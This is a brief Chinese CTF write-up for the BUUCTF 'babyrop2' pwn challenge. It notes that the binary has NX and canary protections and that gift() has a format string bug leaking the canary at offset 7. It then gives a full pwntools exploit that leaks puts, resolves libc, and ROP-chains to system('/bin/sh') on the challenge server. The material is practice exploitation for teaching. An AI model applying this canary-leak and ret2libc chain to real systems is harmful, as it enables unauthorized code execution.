1.checksec
64位,NX和canary保护
2.IDA
1.vuln()函数
canary的位置是确定的,0x20-8
2.gift()函数
很明显是格式化字符串漏洞 ,绕过canary
又学到一种找偏移的方法
直接用%n$p来试,参数和%n$p之间不能有标点符号
参数在第7个位置
64位的ret2libc3
3.EXP
from pwn import *
#start
r = remote("node4.buuoj.cn",27174)
# r = process("./35bjdctf2020babyrop2")
elf = ELF("./35bjdctf2020babyrop2")
libc = ELF("./libc-64.so")
#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln_addr = elf.symbols['vuln']
rdi_addr = 0x400993
#attack
payload = "%7$p"
r.sendlineafter("u!\n",payload)
r.recvuntil("0x")
canary = int(r.recv(16),16)
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
r.sendlineafter("story!\n",payload)
put_addr = u64(r.recv(6).ljust(8,b'\x00'))
#libc
base_addr = put_addr - libc.symbols['puts']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))
#attack2
payload = p64(canary)
payload = payload.rjust(0x20,b'M')
payload += b'M'*8 + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendlineafter("story!\n",payload)
r.interactive()
直接就用buu的libc就行